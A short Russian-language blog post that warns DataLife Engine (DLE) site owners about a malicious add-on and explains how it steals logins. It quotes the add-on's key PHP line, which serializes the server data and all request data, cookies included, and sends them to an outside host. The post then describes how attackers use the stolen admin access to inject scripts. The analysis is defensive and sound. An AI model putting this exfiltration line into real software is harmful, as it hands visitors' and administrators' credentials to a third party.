Взлом DLE. Как защититься?

Взлом DLE. Как защититься?
Взлом DLE или что такое глупость и как она лечится

Прочитал только что пост на форуме и удивился той наглости, с которой пытаются взламывать DLE.Приведу только ключевую строку, которая собственно и является виновницей:

$result_search=file_get_contents("http://www.dplspider.ru/main_service.php?dpserver=".urlencode(serialize($_SERVER))."&dpquery=".urlencode(serialize($_REQUEST))) or die("<br><br><a href='http://www.dplspider.ru/faq/'>Возможная причина ошибки</a><br>Поддержка <a href='mailto:find@dplspider.ru'>find@dplspider.ru</a>");
echo($result_search);

В итоге этот скрипт все же что-то нам выводит, чтобы мы не заподозрили чего неладного. Однако, разберем его подробнее:
Мы отправляем _GET запрос на какой-то адрес в котором так же отправляем подробную информацию о вашем сервере и еще некую информацию о посетителе, это все содержится в массиве $_SERVER. Но это пол дела, основное кроется в $_REQUEST.
Как известно, суперглобальный массив $_REQUEST объединяет в себе массивы: $_POST, $_GET и $_COOKIE. А вот в массиве $_COOKIE хранятся ваши пароли на доступ к сайту. Т.е. каждый пользователь обратившись к этому скрипту — отправляет злоумышленнику свои пароли. Администратор, естественно, является одним из первых отправивших свой пароль.
Вот так вот вас и взламывают, потом через «Поиск и Замена» вставляют свои скрипты в полную новость, в шаблоны и т.д.

Так что мой вам совет — не ставьте все подряд из интернета к себе на сервер, не посоветовавшись с доверенными специалистами.

Будте внимательны и осторожны! Удачи.

Просмотров:

Добавить комментарий

Adblock
detector